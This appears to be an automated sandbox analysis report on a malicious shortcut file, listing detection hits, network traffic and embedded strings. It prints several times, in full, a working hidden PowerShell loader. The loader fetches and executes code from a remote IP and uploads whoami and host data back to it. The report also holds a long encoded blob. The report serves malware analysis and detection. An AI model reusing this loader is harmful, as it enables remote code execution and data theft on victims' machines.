f3ynrRKMoe3pejGpDT2ecO74BUiRBTwWWGlAMJc22MG7INYoScNSlmF01M/QUBlLbCmwQ9CTyBQxSAKgMs8drF8X3eJJV1VmUqKrtsWPx926r+53+ftHUgevLs08rlxhTfk6gf7sADM6Pe1qVnCcCSnU5u6u2Kv/CZpSv5YOUM9V7HmhOC1HjCc9U1RoRGNtNkAUVKJqCltpAFIEohJXKgegZMb2bYORJmaGYme2qHuwtN1nxCuZO+VpKFynojRkpgTzwTZrYlf7yfmUoZoJAciB63m5SZHQTKgXHdF6NmG9RJ9viBtlcFRJPelxAyFbhiiQwnrlZxaXsdAgepnlHwSt3RGS4kmo3dRNaGm2lGfW8cicI+6zATDQ3wdidCvv0kN2yfUGxPdZefOhen4EUmciwq7qbcMZTuXPTqwrRM6pQkVMmBxm64xK0VN1r8MuqRqa8oWtYTw/ceE1ZXEsTRb7ev2bBItbdLo8GMztyacNCgQ3gHFHVflcUC53wyskQqPJZIbASdRNC54oeCZzBRAHLCQxqLicgcD6lpT2g
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ProcessId: 7272, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7528, ProcessName: svchost.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: 140AEcuVy7.lnkReversingLabs: Detection: 52%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 2.59.222.98 ports 43820,0,2,3,4,8
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 58056 -> 43820
              Source: unknownNetwork traffic detected: HTTP traffic on port 58057 -> 43820
              Source: global trafficTCP traffic: 192.168.2.5:58056 -> 2.59.222.98:43820
              Source: global trafficHTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 23.41.168.139 23.41.168.139
              Source: Joe Sandbox ViewASN Name: ONEHOSTPLANETUA ONEHOSTPLANETUA
              Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownTCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
              Source: global trafficHTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1Host: 2.59.222.98:43820Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
              Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.drString found in binary or memory: http://2.59.222.98:28402/page107
              Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:28402/page107Bytestf8.GetBytesesX
              Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:28402/page107X
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:43820
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:43820(
              Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:43820/KfngnHb
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:43820/KfngnHbx
              Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.drString found in binary or memory: http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt
              Source: powershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt
              Source: powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m1
              Source: svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}Jump to behavior
